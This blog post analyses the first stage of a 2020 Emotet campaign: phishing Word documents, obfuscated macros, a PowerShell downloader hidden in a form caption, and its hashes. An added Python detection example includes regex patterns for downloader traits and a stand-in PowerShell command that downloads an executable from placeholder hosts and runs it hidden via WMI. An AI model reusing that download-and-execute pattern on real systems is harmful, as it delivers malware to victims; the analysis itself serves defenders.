The security community has enjoyed a few months of silence from Emotet, an advanced and evasive malware threat, since February of this year. But the silence was broken in July as the VMware Threat Analysis Unit (TAU) observed a major new Emotet campaign and, since then, fresh attacks have continued to surface. What caught the attention of VMware TAU is that the security community still lacks the capacity to effectively detect and prevent Emotet, even though it first appeared in 2014. As an example of this, Figure 1 shows the detection status on VirusTotal for one of the weaponized documents from a recent Emotet attack. Only about 25% of antivirus engines blocked the file, even though the key techniques — such as a base64-encoded PowerShell script used to download the Emotet payload from one of five URLs — are nothing new. (These results were checked five days after they were first submitted to VirusTotal.)

Figure 1: Detection of an Emotet-related document on VirusTotal

In this blog post, we’ll investigate the first stage of the recent Emotet attacks by analyzing one of the samples from the recent campaign to reveal the tactics, techniques, and procedures (TTPs) used. This will help us understand how this malware was able to escape detection from a majority of antivirus engines.

What is Emotet?

Emotet is a Trojan, operated by a cybercrime group known as Mealybug, that mainly spreads through spam emails containing either malicious macro-enabled documents or links. Emotet is one of the most dangerous botnets, as it enables criminals to effectively monetize attacks via information theft, email harvesting, and ransomware distribution. Figure 2 illustrates the evolution of Emotet since it was first discovered in 2014. Current versions of Emotet are employed as downloaders for other malware, such as the banking Trojans TrickBot and Qakbot, and Ryuk ransomware.

Figure 2: The evolution of Emotet

Let’s examine a typical Emotet infection chain, as shown in Figure 3. The infection chain starts with a spam or phishing email. A successful attack requires a few steps: first, the recipient must open a weaponized Word document attached to the email; the document typically contains social engineering text designed to entice the victim to enable VBA macro execution in Microsoft Word (which is disabled by default). Once VBA macro execution is enabled, the embedded VBA macro runs and triggers an embedded PowerShell script that downloads and executes the final Emotet payload.

Figure 3: A typical Emotet infection chain

To increase the infection rate, Emotet leverages some common attack tricks, such as social engineering techniques, obfuscated VBA macros, and advanced adversary techniques like hidden PowerShell scripts. This explains why most signature-based detection engines fail to catch new malware variants like the recently observed Emotet attacks. In the following sections, we describe in detail the TTPs used in the recent Emotet infection chain, and we explain how those TTPs enable Emotet to evade static detection.

Unpacking Recent Emotet Attacks

Last month, we saw two major Emotet waves attacking our customers, occurring on August 7 and August 10. Figure 4 shows the detection timeline from this period.

Figure 4: Detection timeline of Emotet that affected VMware customers from both EMEA and US regions

The attacks used some common techniques, such as data obfuscation and VBA and PowerShell scripting, as shown in Table 1.

Initial Access           | Execution                                | Defense Evasion
Spearphishing Attachment | PowerShell                               | Obfuscated Files or Information
                         | Visual Basic                             | Deobfuscate/Decode Files or Information
                         | Malicious File                           | Hidden Window
                         | Windows Management Instrumentation (WMI) |

Table 1: Tactics and techniques used by the downloader

All the samples we checked fall into the same category: the Word document contains a typically obfuscated VBA macro, but the PowerShell script is stored as caption metadata in a hidden UserForm object (more details on this below). The documents carry both conventional names, such as Form – Aug 07, 2020.doc, invoices 00436 & 9445.doc, and PO# 08102020Ex.doc, and, unsurprisingly, COVID-19-themed names, like COVID-19 report 08 07 2020.doc.

MD5 40961300e6ae0ebbb65cd47c6daa4413
SHA1 032d9de3513b370abbe41803ed792d3bf92b834e
SHA256 dba1dec44b054e17d9551d8832427bbca55d0e7fe1e15bc527e406cdc03628d1
File name Form – Aug 07, 2020.doc, COVID-19 report 08 07 2020.doc
Size 173767 bytes
Type application/msoffice-doc

Table 2: A typical Emotet-weaponized Word document from the attacks

The Emotet downloader

To investigate the attacks, we analyzed one of the samples from the campaign, listed in Table 2. This is a typical single-page weaponized document containing the usual social engineering text, as shown in Figure 5. In this case, the malware writer tries to entice the victim to enable VBA macro execution by claiming that the file was created on an iOS device.

Figure 5: The opening page from the sample listed in Table 2

As we’ve seen in typical document-based attacks, the file contains highly obfuscated VBA macros. If macros are enabled, the embedded VBA script is executed. Figure 6 shows a snippet of the macros. The highlighted code is a human-unreadable macro snippet that creates the infamous winmgmts:Win32_Process WMI class object used to invoke PowerShell processes.

In past attacks, we could still see traces of the string “winmgmts:Win32” or “PowerShell” in the obfuscated macros. This matters because most signature-based detection heuristics are based on string patterns created by human analysts via static analysis: if certain patterns match, detection is triggered. But in the recent Emotet attacks, it’s almost impossible to find any trace of the class or application names, thanks to the extreme obfuscation of the macros. This partly explains why the attacks successfully evaded many signature-based detection engines.

Figure 6: Obfuscated VBA macros

Emotet is well known for leveraging WMI and PowerShell to launch attacks. Therefore, it’s crucial to identify the malicious PowerShell script. The main VBA module extracted from the file is not particularly long, so we suspected that some of the payload might be stored in other OLE objects. This is a common tactic used by attackers. Inspecting the macros reveals an interesting line in the code, which appears to load content from the caption metadata of an object’s page (at index 1), as shown in Figure 7.

Figure 7: Load an object’s page “Caption” metadata

The page “Caption” metadata is related to a multipage control object with page tabs from a hidden form, as shown in Figure 8. Leveraging form controls is a known technique of malware writers.

Figure 8: PowerShell script stored in Page2 “Caption” in a form

It turns out that the string value for the page caption is extremely long. Figure 9 shows part of the string.

Figure 9: Highly obfuscated long string extracted from the form page “Caption”

According to Figure 7, this string is saved in a variable q, which is passed to a function for de-obfuscation, as shown below.

Figure 10: De-obfuscate the PowerShell script

This is actually a de-obfuscation process to generate the working PowerShell script. The decoded content is shown in Figure 11. Here we see the familiar base64-encoded PowerShell script used in most Emotet attacks.

Figure 11: Base64-encoded PowerShell script

After decoding the base64-encoded script, removing garbage code, and renaming some variables, we can see the functionality of the script, as shown in Figure 12. The script tries to download an Emotet payload from one of five URLs (whichever responds first) onto the victim’s machine, then executes it by calling the Create method of the WMI class.

Figure 12: Decoded and cleaned-up PowerShell script

Once the obfuscated PowerShell script is loaded from the caption metadata (as in Figure 7) and de-obfuscated (as in Figure 9), the PowerShell process is invoked using the create method in the WMI class, as shown in Figure 13 below.
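Two of the traits described above lend themselves to simple triage: the long obfuscated string hidden in a form control’s Caption (Figures 8 and 9) and the base64-encoded PowerShell command it produces (Figures 11 and 12). The following Python is an added example, not code from VMware TAU or from the post; it assumes the form strings have already been pulled out of the document (for instance with olevba) and uses a constructed stand-in script on .invalid domains rather than the real decoded payload.

```python
import base64
import math
import re
from collections import Counter

# -EncodedCommand (or a short form) followed by the base64 argument.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand: PowerShell expects base64
    of a UTF-16LE string, so decoding the bytes as ASCII gives garbage."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def shannon_entropy(s):
    """Bits per character; an obfuscated blob scores far above plain text."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def suspicious_form_string(s, min_len=200, min_entropy=4.0):
    """Triage rule for strings pulled from UserForm controls such as a MultiPage
    page Caption: a legitimate caption is short and readable, a payload is not."""
    return len(s) >= min_len and shannon_entropy(s) >= min_entropy

def score_script(cmdline, script):
    """Flag the downloader traits listed in Table 1 and seen in Figure 12."""
    return {
        "url_count": len(URL_RE.findall(script)),
        "downloader": bool(re.search(r"downloadfile|downloadstring", script, re.I)),
        "wmi_process_create": bool(re.search(r"win32_process", script, re.I))
        and ".create(" in script.lower(),
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I)),
    }

# Constructed stand-in with the traits the post describes (five URLs, WMI
# Create, hidden window); .invalid domains, not the campaign's real URLs.
SAMPLE_SCRIPT = (
    "$p=$env:TEMP+'\\498.exe';$u='http://a.invalid/x/','http://b.invalid/x/',"
    "'http://c.invalid/x/','http://d.invalid/x/','http://e.invalid/x/';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "([wmiclass]'win32_Process').Create($p);break}catch{}}"
)
SAMPLE_CMDLINE = "powershell -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()
```

Running `score_script(SAMPLE_CMDLINE, decode_encoded_command(SAMPLE_CMDLINE))` on the stand-in reports five URLs and all three behaviours, which is the combination worth alerting on regardless of how the VBA that launched it was obfuscated.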

Figure 13: Invoke PowerShell process via WMI

Figure 14 shows the fishbone chart detailing the infection chain in a controlled environment when executing the VBA and PowerShell scripts in the document file. As we can see, it involves a few interesting subjects, such as powershell.exe (subject 2), the Emotet Trojan 498.exe (subject 4) and the second stage payload (subject 5).

Figure 14: Emotet downloader infection chain

Conclusion

In the attacks discussed above, Emotet successfully leveraged various techniques to maximize its infection rate. As with typical Emotet attacks, the infection process starts with a spam campaign using phishing emails with attached, weaponized Word documents. Our findings show that the evasion techniques used in the attacks, such as heavily obfuscating VBA macros and leveraging form controls like multipage captions to hide a PowerShell script, have proved very effective in defeating signature-based detection. This kind of detection avoidance has made Emotet one of the most dangerous malware threats today. It is expected that Emotet will continue to evolve its TTPs over time to remain undetected — and that fact imposes significant challenges on detection engines that are heavily dependent on signatures. On the other hand, behavior-based approaches, such as VMware’s AI-driven Advanced Threat Analyzer, show great effectiveness in defeating attacks that leverage the techniques discussed above.

Appendix: IoCs
